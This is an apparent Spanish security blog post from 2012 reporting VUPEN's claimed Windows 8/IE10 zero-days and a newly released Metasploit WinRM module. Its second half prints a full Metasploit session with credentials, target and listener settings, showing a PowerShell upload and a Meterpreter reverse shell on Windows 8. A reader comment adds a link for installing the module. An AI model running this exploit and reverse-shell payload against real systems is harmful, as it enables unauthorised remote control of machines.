Primeros exploits de día 0 para Windows 8

Menos de una semana después de que Microsoft lanzara su flamante Windows 8, los hackers franceses de Vupen han desarrollado un exploit para este nuevo sistema operativo e Internet Explorer 10. Chaouki Bekrar, CEO de Vupen, escribía en Twitter "Damos la bienvenida a #Windows 8 con varios 0Ds combinados para pwn todas las nuevas mitigaciones de exploits de Win8/IE10, Felicidades a nuestro mitigador de mitigaciones @n_joly".

Recordemos que, entre las características de seguridad de Microsoft Windows 8, se incluye por defecto DEP (Data Execution Protection) y ASLR (Address Space Layout Randomization) para aleatorizar la localización de las instrucciones de los programas en memoria e impedir que se ejecuten datos en algunas direcciones específicas. Además, se añaden técnicas antiROP (Return-oriented programming) para proteger estos dos métodos y se incluye la aplicación anti-malware Windows Defender y la última versión de Internet Explorer utiliza un "sandbox" llamado  AppContainer para intentar impedir que se ataque directamente al sistema a través del navegador.

Sin embargo, es evidente que Windows 8 no es invulnerable y ya en la conferencia Black Hat de este verano se mostraron exploits que teóricamente evadían sus medidas de seguridad. Tarjei Mandt, investigador de seguridad Azimuth Security comentaba "El kernel de Windows 8 fundamentalmente no cambia ninguno de los algoritmos usados en Windows 7 ... Más que nada es una versión fortificada de Windows 7 sin cambios estructurales significativos, pero incluye muchas más comprobaciones".

Por otra parte Microsoft alega que vieron el tweet de Vupen pero que dicha organización todavía no ha compartido con ellos los detalles. Y es que Vupen se lucra en gran parte gracias a la venta de sus hacks e información a agencias gubernamentales y, en definitiva, al mejor postor: "Nuestro primer 0day para Win8+IE10 con HiASLR/AntiROP/DEP y evasión del Mod Prot sandbox (no necesario Flash) está ya disponible para clientes. Bienvenido #Windows8".


Además, en las últimas horas se ha liberado un módulo de Metasploit capaz de explotar el servicio Windows Remote Management (WinRM) para obtener una sesión de Meterpreter. Bienvenido Windows 8 a este nuestro mundo cruel xD:


    msf  exploit(winrm_powershell) > show options
     
    Module options (exploit/windows/winrm/winrm_powershell):
     
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
       PASSWORD  omfg             no        A specific password to authenticate with
       Proxies                    no        Use a proxy chain
       RHOST     10.6.255.158     yes       The target address
       RPORT     5985             yes       The target port
       URI       /wsman           yes       The URI of the WinRM service
       USERNAME  sinn3r           no        A specific username to authenticate as
       VHOST                      no        HTTP server virtual host
     
     
    Payload options (windows/meterpreter/reverse_tcp):
     
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
       LHOST     10.6.255.84      yes       The listen address
       LPORT     4444             yes       The listen port
     
     
    Exploit target:
     
       Id  Name
       --  ----
       0   Automatic
     
     
    msf  exploit(winrm_powershell) > rexploit
    [*] Reloading module...
     
    [*] Started reverse handler on 10.6.255.84:4444
    [*] Attempting to set Execution Policy
    [*] Grabbing %TEMP%
    [*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
    [*] Attempting to execute script...
    [*] Sending stage (752128 bytes) to 10.6.255.158
    [*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
     
    meterpreter >
    [*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
    [*] Current server process: powershell.exe (2844)
    [+] Migrating to 696
    [+] Successfully migrated to process
     
    meterpreter > sysinfo
    Computer        : WIN-VFQHRRTCA39
    OS              : Windows 8 (Build 9200).
    Architecture    : x86
    System Language : en_US
    Meterpreter     : x86/win32
    meterpreter >
  Fuentes:
Government hackers develop Windows 8 exploit – already
Security firm VUPEN claims to have hacked Windows 8 and IE10
VUPEN Researchers Say They Have Zero-Day Windows 8 Exploit
Weekly Metasploit Update: WinRM Part One, Exploiting Metasploit, and More!

2 comentarios :

  1. Como puedo agregarlo a metasploit framework?? podrias decirme con que nombre y en que directorio debo copiar el exploit,

    gracias,
    sois geniales

    bigByte

    ResponderEliminar
  2. hola @bigByte,

    basta con actualizar Metasploit o, si lo prefieres, descargar el script directamente a tu directorio de exploits:

    https://raw.github.com/rapid7/metasploit-framework/master/lib/msf/core/exploit/winrm.rb

    Saludos!

    ResponderEliminar